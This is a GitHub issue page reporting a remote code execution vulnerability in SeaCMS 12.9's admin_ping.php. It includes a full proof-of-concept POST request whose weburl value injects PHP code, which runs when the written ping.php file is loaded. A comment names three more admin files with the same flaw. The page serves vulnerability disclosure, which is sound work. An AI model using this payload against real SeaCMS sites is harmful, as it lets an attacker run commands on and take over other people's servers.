CMS icon indicating copy to clipboard operation
CMS copied to clipboard
Published 4 months ago verified publisher icon seacms-net

SeaCMS v12.9 admin_ping.php 远程代码执行

Open pysnow1 opened this issue 1 year ago • 1 comments

Introduction

SeaCMS is a free, open-source website content management system written in PHP. The system is mainly designed to manage video-on-demand resources.

SeaCMS 12.9 version has a remote code execution vulnerability. The vulnerability is caused by admin_ping.php directly splicing and writing the user input data into ping.php without processing it, which allows authenticated attackers to exploit the vulnerability to execute arbitrary commands and obtain system permissions.

Environment

https://github.com/seacms-net/CMS/blob/master/SeaCMS_12.9_%E6%B5%B7%E6%B4%8BCMS%E5%AE%89%E8%A3%85%E5%8C%85.zip

Analysis

The weburl and token passed in to admin_ping.php are not filtered, but directly concatenated and written into the admin_ping.php file, resulting in arbitrary code execution.

Verify

POST /xotry/admin_ping.php?action=set HTTP/1.1
Host: 192.168.126.128:8082
Cookie: PHPSESSID=8iuqqnar4ucddeqlp52sdmpbov
Content-Type: application/x-www-form-urlencoded
Content-Length: 56

weburl=1";system('id');//&token=1

Access /data/admin/ping.php and execute the command successfully

pysnow1 avatar Jun 13 '24 07:06 pysnow1

image image image admin_ip.php、admin_smtp.php、admin_weixin.php同样存在同类型漏洞

pysnow1 avatar Jun 13 '24 09:06 pysnow1